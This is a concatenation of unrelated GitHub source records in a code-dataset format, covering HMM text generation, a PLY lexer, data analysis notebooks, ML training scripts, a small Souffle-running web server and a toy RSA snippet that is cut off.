range(len(possible_emissions)):\n if i not in syllable_dict:\n possible_emissions[i] = 0\n else:\n word_syllables = syllable_dict[i]['normal'] + syllable_dict[i]['end']\n if min(normal_syllable_count) + min(word_syllables) > 10:\n possible_emissions[i] = 0\n possible_emissions = [possible_emissions[i]/sum(possible_emissions) for i in range(len(possible_emissions))]\n\n while rand_var > 0:\n rand_var -= possible_emissions[next_obs]\n next_obs += 1\n\n next_obs -= 1\n \n # Add the emission to the beginning or end of the emission list\n if reverse:\n emission.insert(0, next_obs)\n else:\n emission.append(next_obs)\n \n # Keep track of how many syllables this line could have\n obs_syllables_normal = syllable_dict[next_obs]['normal']\n obs_syllables_end = syllable_dict[next_obs]['end']\n \n new_normal_syllable_count = []\n new_end_syllable_count = []\n \n for i in range(len(normal_syllable_count)):\n # Add syllables in this word to syllables of the line\n for j in range(len(obs_syllables_normal)):\n new_normal_syllable_count.append(normal_syllable_count[i] + obs_syllables_normal[j])\n \n # Include all previous possibilies plus the end possibilies for this word\n new_end_syllable_count = list(new_normal_syllable_count)\n for j in range(len(obs_syllables_end)):\n new_end_syllable_count.append(normal_syllable_count[i] + obs_syllables_end[j])\n \n # Update the syllable counts\n normal_syllable_count = new_normal_syllable_count\n end_syllable_count = new_end_syllable_count\n \n # Sample next state.\n rand_var = random.uniform(0, 1)\n next_state = 0\n\n while rand_var > 0:\n rand_var -= transitions[state][next_state]\n next_state += 1\n\n next_state -= 1\n state = next_state\n\n return emission, states\n \n \n def save(self, filename):\n ''' Save the HMM to file. '''\n \n file = open(filename, 'w')\n \n # Save the parameters\n file.write(str(self.L) + \"\\t\" + str(self.D) + \"\\n\")\n \n # Save the transition matrix\n for i in range(len(self.A)):\n file.write(\"\\t\".join(str(x) for x in self.A[i]) + \"\\n\")\n \n # Save the observation matrix\n for i in range(len(self.O)):\n file.write(\"\\t\".join(str(x) for x in self.O[i]) + \"\\n\")\n \n file.close()\n \n\ndef load(filename):\n ''' Load an HMM from file. '''\n \n A = []\n O = []\n \n file = open(filename, 'r')\n \n # Read the parameters\n L, D = [int(x) for x in file.readline().strip().split('\\t')]\n\n # Read the transition matrix\n for i in range(L):\n A.append([float(x) for x in file.readline().strip().split('\\t')])\n\n # Read the observation matrix\n for i in range(L):\n O.append([float(x) for x in file.readline().strip().split('\\t')])\n \n file.close()\n \n return HiddenMarkovModel(A, O)\n \n\ndef unsupervised_HMM(X, n_states, N_iters):\n '''\n Helper function to train an unsupervised HMM. The function determines the\n number of unique observations in the given data, initializes\n the transition and observation matrices, creates the HMM, and then runs\n the training function for unsupervised learing.\n\n Arguments:\n X: A dataset consisting of input sequences in the form\n of lists of variable length, consisting of integers \n ranging from 0 to D - 1. In other words, a list of lists.\n\n n_states: Number of hidden states to use in training.\n \n N_iters: The number of iterations to train on.\n '''\n\n # Make a set of observations.\n observations = set()\n for x in X:\n observations |= set(x)\n \n # Compute L and D.\n L = n_states\n D = len(observations)\n\n # Randomly initialize and normalize matrices A and O.\n A = [[random.random() for i in range(L)] for j in range(L)]\n\n for i in range(len(A)):\n norm = sum(A[i])\n for j in range(len(A[i])):\n A[i][j] /= norm\n \n # Randomly initialize and normalize matrix O.\n O = [[random.random() for i in range(D)] for j in range(L)]\n\n for i in range(len(O)):\n norm = sum(O[i])\n for j in range(len(O[i])):\n O[i][j] /= norm\n\n # Train an HMM with unlabeled data.\n HMM = HiddenMarkovModel(A, O)\n HMM.unsupervised_learning(X, N_iters)\n\n return HMM\n\n","repo_name":"Interflux/cs155-miniproject3","sub_path":"HMM.py","file_name":"HMM.py","file_ext":"py","file_size_in_byte":19768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19348798202","text":"\"\"\"\nlex.py\n\nTokenizer for vslc\n\nparameters for build():\n debug=1: Enable debug features\n optimize=1: Force set -o option to 1 when specifying -o option to python\n\"\"\"\nimport ply.lex as lex\n\nfrom config import lexer_debug, lexer_optimize\n\n\nclass VSLCLexer(object):\n\n lexer = None # Wait to be initialized\n\n # All lexers must provide a list `tokens` that defines all of the possible token names\n # that can be produced by the lexer.\n tokens = [\n 'NUMBER', # [0-9]*\n 'PLUS', # +\n 'MINUS', # -\n 'TIMES', # *\n 'DIVIDE', # /\n 'LPAREN', # (\n 'RPAREN', # )\n 'LBRACK', # {\n 'RBRACK', # }\n 'ASSIGN', # :=\n 'COMMA', # ,\n 'TEXT', # \".*\"\n 'ID', # [A-Za-z]([A-Za-z]|[0-9])*\n ]\n\n # To handle reserved words (keywords), you should write a single rule to match an identifier\n # and do a special name lookup in a function\n reserved = {\n 'FUNC': 'FUNC',\n 'VAR': 'VAR',\n 'PRINT': 'PRINT',\n 'RETURN': 'RETURN',\n\n 'IF': 'IF',\n 'THEN': 'THEN',\n 'ELSE': 'ELSE',\n 'FI': 'FI',\n\n 'WHILE': 'WHILE',\n 'DO': 'DO',\n 'DONE': 'DONE',\n }\n\n tokens += list(reserved.values())\n\n # Regular expression rules for simple tokens\n # Each token is specified by writing a regular expression rule compatible with Python's re module.\n # Each of these rules are defined by making declarations with a special prefix t_ to indicate that\n # it defines a token.\n t_PLUS = r'\\+'\n t_MINUS = r'-'\n t_TIMES = r'\\*'\n t_DIVIDE = r'/'\n t_LPAREN = r'\\('\n t_RPAREN = r'\\)'\n t_LBRACK = r'\\{'\n t_RBRACK = r'\\}'\n t_ASSIGN = r':='\n t_COMMA = r','\n t_TEXT = r'\\\"([^\\\\\\n]|(\\\\.))*?\\\"'\n\n # Build the lexer\n def build(self):\n self.lexer = lex.lex(module=self, debug=lexer_debug, optimize=lexer_optimize)\n\n # Test it output\n def test(self, data):\n self.lexer.input(data)\n while True:\n tok = self.lexer.token()\n if not tok:\n break\n print(tok)\n\n # If some kind of action needs to be performed, a token rule can be specified as a function.\n def t_ID(self, t):\n r'[A-Za-z_][A-Za-z0-9_]*'\n t.type = self.reserved.get(t.value, 'ID') # Check for reserved words\n return t\n\n def t_NUMBER(self, t):\n r'\\d+\\.?\\d*'\n t.value = float(t.value)\n return t\n\n def t_COMMENT(self, t):\n r'(//.*?(\\n|$))'\n # still +1 lino\n t.lexer.lineno += 1\n\n # Define a rule so we can track line numbers\n def t_newline(self, t):\n r'\\n+'\n t.lexer.lineno += len(t.value)\n\n # A string containing ignored characters (spaces and tabs)\n t_ignore = ' \\t'\n\n # Error handling rule\n def t_error(self, t):\n print(\"Illegal character '%s'\" % t.value[0])\n t.lexer.skip(1)\n\n # Since column information is often only useful in the context of error handling,\n # calculating the column position can be performed when needed as opposed to doing it for each token.\n @staticmethod\n def find_column(_input, token):\n \"\"\"\n Compute column.\n :param _input: the input text string\n :param token: a token instance\n :return:\n \"\"\"\n line_start = _input.rfind('\\n', 0, token.lexpos) + 1\n return (token.lexpos - line_start) + 1\n","repo_name":"EnderQIU/vslcpy","sub_path":"src/lex.py","file_name":"lex.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"16890662689","text":"import json\nfrom my_data2 import json_data\nfrom tkt_model import Tkt_Entry\nfrom cdw_sheet_model import SheetsConnector\n\njira_data = json.loads(json_data)\n\ndef get_newhire_tickets_from_jira(tickets):\n tkt_objects = []\n for item in tickets['issues']:\n field = item['fields']\n key = item['key']\n status = field['status']['name']\n start_date = field['customfield_10800']\n address = field['customfield_10825']\n email = field['customfield_10826']\n bundle = field['customfield_10836']['value']\n first = field['customfield_10839']\n last = field['customfield_10840']\n summary = field['summary']\n try:\n assignee = field['assignee']['displayName']\n except:\n assignee = None\n try:\n tmp_list = []\n for tkt in field['description']['content']:\n for item in tkt['content']:\n if 'text' in item.keys():\n tmp_list.append(item['text'])\n desc = ' '.join(tmp_list)\n description = desc\n except:\n description = None\n cdw_entry = Tkt_Entry(key=key, summary=summary, assignee=assignee, start_date_10800=start_date, email_10826=email, bundle_10836=bundle, equipment=description, other_name_10825=address, first_10839=first, last_10840=last, status = status)\n tkt_objects.append(cdw_entry)\n\n return tkt_objects\n\n\ntickets = get_newhire_tickets_from_jira(jira_data)\nwsconnect = SheetsConnector()\nfor tkt in tickets:\n if tkt.get_key() not in wsconnect.get_key_list() and tkt.get_assignee() and tkt.get_status() != 'Done':\n wsconnect.update_row(tkt)\n","repo_name":"bilnkat/JiraToGSheet","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1436332861","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[3]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# In[4]:\n\n\npro=pd.read_csv('D:\\Python_Diwali_Sales_Analysis-main\\Diwali Sales Data.csv',encoding='unicode_escape')\n\n\n# In[5]:\n\n\npro.head()\n\n\n# In[6]:\n\n\npro.info()\n\n\n# In[7]:\n\n\npro.shape\n\n\n# In[8]:\n\n\npro.drop(['Status','unnamed1'],axis=1,inplace=True)\n\n\n# In[10]:\n\n\npro.head()\n\n\n# from above table we can see that Status and unnamesd1 column are drop. we drop this column because its contain 0 data that why we don't need this\n\n# In[11]:\n\n\npro.isnull().sum()\n\n\n# In[19]:\n\n\npro.dropna(inplace=True)\n\n\n# In[23]:\n\n\npro.isnull()\n\n\n# In[24]:\n\n\npro.isnull().sum()\n\n\n# In[25]:\n\n\npro.shape\n\n\n# In[30]:\n\n\npro['Amount']=pro['Amount'].astype('int')\n\n\n# In[32]:\n\n\npro['Amount'].dtypes\n\n\n# In[34]:\n\n\npro.columns\n\n\n# In[37]:\n\n\npro.rename(columns={'Marital_Status':'Marriage'})\n\n\n# In[40]:\n\n\npro.describe()\n\n\n# In[42]:\n\n\npro[['Age','Orders','Amount']].describe()\n\n\n# # Data analysis\n# \n\n#

Gender

\n\n# In[49]:\n\n\ngen=sns.countplot(x='Gender',data=pro)\n\nfor i in gen.containers:\n gen.bar_label(i)\n\n\n# In[55]:\n\n\ngen=pro.groupby(['Gender'],as_index=False)['Amount'].sum().sort_values(by='Amount',ascending=False)\ngen\n\n\n# In[56]:\n\n\ngen=pro.groupby(['Gender'],as_index=False)['Amount'].sum().sort_values(by='Amount',ascending=False)\n\n\nsns.barplot(x=\"Gender\",y=\"Amount\",data=gen)\n\n\n# From above we can see that most of the buyer are female and even the purchasing power of female is greater than men\n\n#

Age group

\n\n# In[65]:\n\n\ngen=sns.countplot(x='Age Group',data=pro ,hue='Gender')\n\nfor i in gen.containers:\n gen.bar_label(i)\n\n\n# In[66]:\n\n\nage=pro.groupby(['Age Group'],as_index=False)['Amount'].sum().sort_values(by='Amount',ascending=False)\nage\n\n\n# In[68]:\n\n\nage=pro.groupby(['Age Group'],as_index=False)['Amount'].sum().sort_values(by='Amount',ascending=False)\n\n\nsns.barplot(x=\"Age Group\",y=\"Amount\",data=age)\n\n\n# from above graph we can see that most of the buyer are of age group between 26-35 year respectively\n\n#

State

\n\n# In[14]:\n\n\nstates=pro.groupby(['State'],as_index=False)['Orders'].sum().sort_values(by='Orders',ascending=False).head(10)\n\nsns.set(rc={'figure.figsize':(15,5)})\n\nsns.barplot(x=\"State\",y=\"Orders\",data=states)\n\n\n# In[33]:\n\n\nstate1=pro.groupby(['State'],as_index=False)['Amount'].sum().sort_values(by='Amount',ascending=False).head(10)\n\n\nsns.set(rc={'figure.figsize':(15,5)})\n\nsns.barplot(x=\"State\",y=\"Amount\",data=state1)\n\n\n# from above graph we can see that unexpectedly most of the order and the buyer are from utter Pradesh , Maharastra , Karnataka respectively.\n\n#

Marital Status\n\n# In[18]:\n\n\nMarried=sns.countplot(x='Marital_Status',data=pro)\nsns.set(rc={\"figure.figsize\":(7,5)})\nfor i in Married.containers:\n Married.bar_label(i)\n\n\n# In[19]:\n\n\ngen=sns.countplot(x='Marital_Status',data=pro ,hue='Gender')\n\nfor i in gen.containers:\n gen.bar_label(i)\n\n\n# In[21]:\n\n\nstate1=pro.groupby(['Marital_Status',\"Gender\"],as_index=False)['Amount'].sum().sort_values(by='Amount',ascending=False).head(10)\n\n\n\nsns.barplot(x=\"Marital_Status\",y=\"Amount\",data=state1,hue=\"Gender\")\n\n\n# From Above graph we can see that most of the buyer are married (women) and they have high purchasing power\n# \n# \n#

Product Category

\n\n# In[43]:\n\n\nsns.set(rc={\"figure.figsize\":(15,5)})\nproduct=sns.countplot(x=\"Product_Category\",data=pro)\n\n\nfor i in product.containers:\n product.bar_label(i)\n\n\n# In[27]:\n\n\nproduct1=pro.groupby([\"Product_Category\"],as_index=False)['Amount'].sum().sort_values(by='Amount',ascending=False).head(10)\n\n\n\nsns.barplot(x=\"Product_Category\",y=\"Amount\",data=product1)\n\n\n# From Above graph we can see that most of the sold product from Food , Clothing ,Electronic Category\n# \n#

Occupation

\n\n# In[31]:\n\n\nocc=sns.countplot(x=\"Occupation\",data=pro)\n\nfor i in occ.containers:\n occ.bar_label(i)\n\n\n# In[32]:\n\n\npocc1=pro.groupby([\"Occupation\"],as_index=False)['Amount'].sum().sort_values(by='Amount',ascending=False).head(10)\n\nsns.barplot(x=\"Occupation\",y=\"Amount\",data=occ1)\n\n\n# From Above graph we can see that most of the buyer are working in It , Healthcare, Aviation\n\n#

Product iD

\n\n# In[52]:\n\n\nproductids=pro.groupby([\"Product_ID\"],as_index=False)['Orders'].sum().sort_values(by='Orders',ascending=False).head(10)\n\nsns.barplot(x=\"Product_ID\",y=\"Orders\",data=productids)\n\n\n# # Conclusion\n\n# Marriage women age between 26-35 years from Up , Maharastra, Karnataka working in IT, Food , Avation are more likely to buy a product from Food, clothing and Electronic catrgory\n\n# \n\n# \n\n# In[ ]:\n\n\n\n\n","repo_name":"sandeshjah/Projects","sub_path":"Data_Analytics_projects/Diwali_data_analysis_project.py","file_name":"Diwali_data_analysis_project.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25634811726","text":"# gaf_to_func.fly.py\nimport csv\nfrom collections import defaultdict\n\n# SUPPORT = [\"EXP\", \"IMP\", \"ISS\", \"ISM\", \"TAS\", \"IEA\", \"HMP\", \"IDA\", \"IGI\",\n# \"ISO\", \"IGC\", \"NAS\", \"HGI\", \"IPI\", \"IEP\", \"ISA\", \"RCA\", \"IC\", \"HDA\"]\n\nSUPPORT = [\"EXP\", \"IMP\", \"HMP\", \"HEP\", \"IDA\", \"IGI\", \"HGI\", \"IPI\", \"IEP\", \"HDA\"]\n\nANNOTATION_TYPES = [\"P\", \"F\", \"C\"] # Use C for Cellular comp.\n\n\n\ndef write_preamble(f):\n support = \" \".join(SUPPORT)\n f.write(\"# species: Drosophila melanogaster\\n\")\n f.write(f\"# support: {support}\\n\")\n for _ in range(18):\n f.write(\"# \\n\")\n\n\ndef go_compare(x):\n go_label = x[0]\n go_val = int(go_label[3:])\n return go_val\n\n\nfname = \"sampledata/fb.gaf.clean\"\n\nwith open(fname, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\")\n raw_data = list(reader)\n\nfunc_to_go = defaultdict(list)\n\nfor row in raw_data:\n go_label = row[4]\n exp_type = row[6]\n go_type = row[8]\n id_list = row[10].split(\"|\")\n \n for i, item in enumerate(id_list):\n if item.startswith(\"CG\") or item.startswith(\"CR\"):\n func_to_go[id_list[i]] += [(go_label, exp_type, go_type)]\n continue\n # print(\"no CG\")\n\ngo_to_gene = defaultdict(list)\n\nfor key, vals in func_to_go.items():\n for go_label, exp_type, go_type in vals:\n if exp_type in SUPPORT and go_type in ANNOTATION_TYPES:\n go_to_gene[go_label] += [key]\n\ngo_to_gene_list = sorted(list(go_to_gene.items()), key=go_compare)\nwith open(f\"{fname}.associations.3\", \"w\") as f:\n write_preamble(f)\n for go_label, protein_list in go_to_gene_list:\n protein_str = \" \".join(protein_list)\n f.write(f\"{go_label}\\tPROTEIN_FUNCTIONALITY\\t{protein_str}\\n\")\n","repo_name":"merterden98/cascade","sub_path":"gaf_to_func.fly.py","file_name":"gaf_to_func.fly.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1323075927","text":"import http.server\nimport subprocess\nimport os\nimport sys\nimport random\nimport string\nimport tempfile\nimport shutil\nimport json\nfrom threading import Lock\n\n# To start the server:\n# python server.py [port]\n\n# Some common HTTP response codes:\n# 200 - OK, the request was fulfilled.\n# 400 - Bad Request, something is wrong and it's the clients fault\n# 403 - Permission Denied\n# 404 - Not Found\n# 408 - Request Timeout\n# 500 - Internal Server Error, something is wrong and it's our fault\n# 501 - Not Implemented\n\nconfig = json.loads(open(\"config.json\").read())\ntime_limit = config[\"time_limit\"]\nmem_limit = config[\"mem_limit\"]\n\nport = 8000\ntokens = set()\n\nif len(sys.argv) == 2:\n\tport = int(sys.argv[1])\n\nsession_mutex = Lock()\n\ndef generate_token():\n\tsession_mutex.acquire()\n\t\n\ttoken = ''.join(random.choices(string.ascii_letters + string.digits, k=8))\n\twhile (token in tokens):\n\t\ttoken = ''.join(random.choices(string.ascii_letters + string.digits, k=8))\n\ttokens.add(token)\n\t\n\tsession_mutex.release()\n\treturn token\n\ndef delete_token(token):\n\tsession_mutex.acquire()\n\ttokens.remove(token)\n\tsession_mutex.release()\n\ndef generate_fact_file(dictionary, path):\n\tfile_name = dictionary[\"name\"]\n\tncols = dictionary[\"ncols\"]\n\tdata = dictionary[\"data\"]\n\toutput_file = os.path.join(path, file_name + \".facts\")\n\tfile = open(output_file, \"w+\")\n\tfor row in data:\n\t\tfile.write(\"\\t\".join(str(e) for e in row))\n\t\tfile.write(\"\\n\")\n\tfile.close()\n\ndef create_temp_dir(token):\n\tpath = os.path.join(tempfile.gettempdir(), \"souffle-web-session\", token)\n\tif os.path.exists(path):\n\t\tshutil.rmtree(path)\n\tos.makedirs(path)\n\treturn path\n\ndef run_souffle(src, dir):\n\targs = [\"./third-party/timeout\", \"-t\", str(time_limit), \"-m\", str(mem_limit), \"--no-info-on-success\", \"-c\", \"souffle\", \"/dev/stdin\", \"-D\", \"-\"]\n\tif dir != None:\n\t\targs.extend([\"-F\", dir])\n\treturn subprocess.run(args, input=src, encoding=\"utf8\", capture_output=True, text=True)\n\nclass RequestHandler(http.server.BaseHTTPRequestHandler):\n\tdef api_do_run(self, basedir):\n\t\tlength = int(self.headers[\"Content-Length\"])\n\t\ttype = self.headers[\"Content-Type\"]\n\t\t\n\t\tif type != \"application/json\":\n\t\t\tself.send_error(400, \"Wrong Content-Type, expected application/json\")\n\t\t\treturn\n\t\t\n\t\tbody = self.rfile.read(length)\n\t\treq = json.loads(body)\n\t\t\n\t\tfor table in req[\"tables\"]:\n\t\t\tgenerate_fact_file(table, basedir)\n\t\t\n\t\tresp = {};\n\n\t\ttry:\n\t\t\tproc = run_souffle(req[\"souffle_code\"], basedir)\n\t\texcept FileNotFoundError:\n\t\t\tself.send_error(500, \"Souffle is not installed\")\n\t\t\treturn\n\t\t\n\t\tif proc.returncode in range(128, 128 + 65):\n\t\t\tself.send_error(408, \"Forcibly killed due to time or memory limit reached\")\n\t\t\treturn;\n\t\t\n\t\tresp[\"return_code\"] = proc.returncode;\n\t\tresp[\"stdout\"] = proc.stdout;\n\t\tresp[\"stderr\"] = proc.stderr;\n\t\t\n\t\trespbytes = bytearray(json.dumps(resp), \"utf8\")\n\n\t\tself.send_response(200)\n\t\tself.send_header(\"Content-Type\", \"application/json\")\n\t\tself.send_header(\"Content-Length\", len(respbytes))\n\t\tself.end_headers()\n\n\t\tself.wfile.write(respbytes)\n\n\tdef do_POST(self):\n\t\tif self.path == \"/api/run\":\n\t\t\tself.error_message_format = \"{\\\"error\\\": \\\"%(message)s\\\"}\"\n\t\t\tself.error_content_type = \"application/json\"\n\t\t\t\n\t\t\tsession = generate_token()\n\t\t\tbasedir = create_temp_dir(session)\n\n\t\t\ttry:\n\t\t\t\tself.api_do_run(basedir)\n\t\t\texcept json.decoder.JSONDecodeError:\n\t\t\t\tself.send_error(400, \"Malformed JSON (invalid syntax)\")\n\t\t\texcept KeyError:\n\t\t\t\tself.send_error(400, \"Malformed request object (missing field?)\")\n\n\t\t\tshutil.rmtree(basedir)\n\t\t\tdelete_token(session)\n\t\telse:\n\t\t\tself.send_error(404)\n\nsv = http.server.ThreadingHTTPServer((\"\", port), RequestHandler)\nprint(\"Starting server on port \" + str(port))\nsv.serve_forever()\n","repo_name":"jbre4/souffle-web","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"31064783856","text":"from data import test\nimport math\nimport sys\n\n\ndef binary_search(list, item):\n low = 0\n high = len(list) - 1\n while low <= high:\n middle = math.floor((low + high) / 2)\n if list[middle] == item:\n return middle\n elif list[middle] > item:\n high = middle - 1\n else:\n low = middle + 1\n return \"Not found\"\n\n\nprint(binary_search(test, int(sys.argv[1])))\n","repo_name":"petrussola/challenges-algorithms-1","sub_path":"02_binary_search.py","file_name":"02_binary_search.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2117473142","text":"import torch as t\nimport numpy as np\n\n\nclass Predictor:\n def __init__(self, test, model, batch_size, sequence_length, loss, dropout, times):\n \"\"\"\n Predictor class to predict test dataset\n :param test: iterator\n :param model: trained model\n :param batch_size: batchsize\n :param sequence_length: used window, must be the same as the one used in training\n :param loss: the wanted loss function\n \"\"\"\n self.test = test\n self.loss = loss\n self.model = model\n self.batch_size = batch_size\n self.sequence_length = sequence_length\n self.dropout = dropout\n self.times = times\n\n def predict(self, ):\n \"\"\"\n This function predict an entire sub-dataset from CMAPS\n :return: mean loss, true labels, predicted labels,\n True labels might be > dataset rows due to padding of the last batch while using batchsize = 1\n \"\"\"\n outputs = []\n losses = []\n real = []\n stds = []\n\n with t.no_grad():\n for data in self.test:\n\n\n if t.cuda.is_available():\n\n sequence, label = data[0].cuda(), data[1].cuda()\n else:\n sequence, label = data[0], data[1]\n if sequence.shape[0] < self.batch_size:\n continue\n\n if self.dropout or self.model.get_name() == \"BAYSIAN_LSTM\":\n loss, output, y, std = self.predict_with_uncertainty(sequence, label)\n\n if t.cuda.is_available():\n std = std.cpu()\n stds.extend(std.numpy())\n else:\n stds.extend(std.numpy())\n\n else:\n\n loss, output, y = self.predict_one_sequence(sequence, label)\n\n losses.append(loss)\n if t.cuda.is_available():\n output = output.cpu()\n y = y.cpu()\n outputs.extend(output.numpy())\n real.extend(y.numpy())\n\n else:\n\n outputs.extend(output.numpy())\n real.extend(y.numpy())\n\n return t.mean(t.stack(losses)), np.asarray(outputs), np.asarray(real), np.asarray(stds)\n\n def predict_with_uncertainty(self, x, y):\n \"\"\"\n Get the prediction mean and uncertainty based on standard deviation\n \"\"\"\n\n outputs = t.zeros([self.times, y.shape[0]])\n for i in range(self.times):\n if t.cuda.is_available():\n output = self.model(x).cpu()\n y = y.cpu()\n outputs[i] = output\n else:\n\n outputs[i] = self.model(x)\n\n mean = t.mean(outputs, dim=0)\n std = t.std(outputs, dim=0)\n\n loss = np.sqrt(self.loss(mean, y))\n return loss, mean, y, std\n\n def predict_one_sequence(self, x, y):\n \"\"\"\n Simple pass forward in the network\n :param x: sequence\n :param y: true label RULs\n :return:\n \"\"\"\n outputs = self.model(x)\n\n loss = t.sqrt(self.loss(outputs, y))\n return loss, outputs, y\n","repo_name":"serop-ba/RUL_Estimation_With_Bayesian_NN","sub_path":"src/models/predict_model.py","file_name":"predict_model.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12830605272","text":"import logging.config\nimport yaml\nimport os\nfrom datetime import datetime\n\nfrom argparse import ArgumentParser\n\nfrom models import CNN, TrainModel, SetOptimizer\nfrom scripts import AutoScript\nfrom data import SetDataLoader\n\nimport torch.nn as nn\n\nwith open(\"config.yml\",\"r\") as file:\n config = yaml.safe_load(file)\n logging.config.dictConfig(config[\"logger\"])\n\nlogger = logging.getLogger(__name__)\n\nif __name__ == \"__main__\":\n\n parser = ArgumentParser(\"main\")\n\n logger.info(\"Model settings : %s\",config[\"model\"])\n logger.info(\"Training settings : %s\",config[\"train\"])\n logger.info(\"Optimizer settings : %s\",config[\"optimizer\"])\n logger.info(\"DataLoader settings : %s\",config[\"data\"])\n logger.info(\"Checkpoint available : %s\",config[\"checkpoint\"] is not None)\n\n model = CNN(**config[\"model\"])\n optimizer = SetOptimizer(model,**config[\"optimizer\"])\n loader = SetDataLoader(**config[\"data\"])\n trainer = TrainModel(model,\n optimizer,\n criterion=nn.CrossEntropyLoss(),\n train_data=loader,**config[\"train\"])\n\n limit_reached = trainer.train()\n\n if limit_reached:\n logger.info(\"Relaunching a script\")\n checkpoint_path = os.path.join(\"checkpoints\",\"model\" + str(datetime.now().strftime(\"%d-%m-%Y_%H-%M-%S\")))\n trainer.export(checkpoint_path)\n autoscripter = AutoScript(config[\"launch_file\"],\"config.yml\")\n autoscripter.modify_config(checkpoint_path)\n autoscripter.launch_scitas_script()\n","repo_name":"arnaudguibbert/ScitasTorch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43661491506","text":"from pathlib import Path\nfrom typing import Any, Optional\n\nimport hydra\nimport torch\nfrom clearml import Logger, Task\nfrom omegaconf import DictConfig\nfrom torch import nn\nfrom torch.optim.lr_scheduler import CosineAnnealingWarmRestarts\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nfrom captcha.api.helpers import evaluation\nfrom captcha.config import net_config, system_config, torch_config\nfrom captcha.nets.define_net import define_net\nfrom captcha.training.train_utils import (\n Phase,\n create_dataloader,\n define_optimizer,\n fix_seeds,\n)\n\n\ndef train_one_epoch(\n model,\n dataloader: DataLoader,\n optimizer: Any,\n criterion: Any,\n epoch: int,\n logger: Optional[Logger],\n):\n model.train()\n running_loss = 0\n iters = len(dataloader)\n print(f\"Starting training epoch {epoch}\")\n for batch_n, batch in tqdm(enumerate(dataloader), total=iters):\n optimizer.zero_grad()\n outputs = model(batch[\"image\"].to(torch_config.device))\n loss = criterion(outputs, batch[\"label\"].to(torch_config.device))\n running_loss += loss.item()\n loss.backward()\n optimizer.step()\n\n if logger is not None:\n logger.report_scalar(\n f\"Running_loss\",\n \"train\",\n iteration=(epoch + 1) * batch_n,\n value=running_loss / (batch_n + 1),\n )\n loss = running_loss / iters\n if logger is not None:\n logger.report_scalar(\"Loss\", \"train\", iteration=epoch, value=loss)\n logger.report_scalar(\n \"LR\", \"train\", iteration=epoch, value=optimizer.param_groups[0][\"lr\"]\n )\n\n return loss\n\n\n@hydra.main(version_base=None, config_path=\".\", config_name=\"config\")\ndef train_model(cfg: DictConfig):\n task = (\n Task.init(project_name=\"captcha\", task_name=cfg.train.task_name)\n if cfg.train.log_clearml\n else None\n )\n logger = None if task is None else task.get_logger()\n fix_seeds()\n\n dataloader = create_dataloader(\n data_dir=Path(cfg.dataloader.data_dir),\n csv_path=[\n cfg.dataloader.train_path,\n cfg.dataloader.eval_path,\n cfg.dataloader.test_path,\n ],\n augmentations_intensity=cfg.dataloader.augmentations_intensity,\n batch_size=cfg.dataloader.batch_size,\n test_size=cfg.dataloader.test_size,\n )\n\n model = define_net(\n model_name=cfg.net.model_name,\n freeze_grads=cfg.net.freeze_grads,\n outputs=net_config.LEN_TOTAL,\n pretrained=cfg.net.pretrained,\n weights=cfg.net.resume_weights,\n )\n\n criterion = nn.MultiLabelSoftMarginLoss()\n optimizer = define_optimizer(cfg.train.optimizer_name, model)\n if cfg.scheduler.scheduler:\n scheduler = CosineAnnealingWarmRestarts(\n optimizer,\n T_0=cfg.scheduler.t0,\n T_mult=cfg.scheduler.t_mult,\n eta_min=0.000001,\n )\n else:\n scheduler = None\n loss = 0.0\n\n for epoch in range(cfg.train.epochs):\n loss = train_one_epoch(\n model, dataloader[Phase.train], optimizer, criterion, epoch, logger\n )\n _ = evaluation(\n model,\n dataloader[Phase.val],\n criterion,\n epoch,\n logger,\n phase=Phase.val.value,\n )\n if dataloader.get(Phase.test) is not None:\n _ = evaluation(\n model,\n dataloader[Phase.test],\n criterion,\n epoch,\n logger,\n phase=Phase.test.value,\n )\n if scheduler:\n scheduler.step()\n\n if cfg.train.model_save_path:\n model_save_path = system_config.model_dir / cfg.train.model_save_path\n model_save_path.mkdir(exist_ok=True, parents=True)\n print(f\"Saving model to {model_save_path} as model.pth\")\n torch.save(\n model, system_config.model_dir / cfg.train.model_save_path / \"model.pth\"\n )\n\n if logger is not None:\n logger.flush()\n\n return loss\n\n\nif __name__ == \"__main__\":\n train_model()\n","repo_name":"AstrakhantsevaAA/Captcha","sub_path":"captcha/training/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12284521824","text":"from math import gcd\n\n# функция эйлера\ndef euler(x):\n r = 0\n for i in range(1, x):\n if gcd(x, i) == 1:\n r += 1\n return r\n\np = 11\nq = 29\nn = p * q\nfn = (p - 1) * (q - 1)\nprint(f'euler: {euler(n)}')\nprint(f'(p-1)*(q-1): {fn}')\n\n# выбираем число e (открытая экспонента)\n# это простое число и в идеале число Ферма\n# e должна быть взаимо простым числом с n ???\ne = 3\n\n# получаем число используя функцию эйлера\nd = e ** (euler(euler(n)) - 1) % 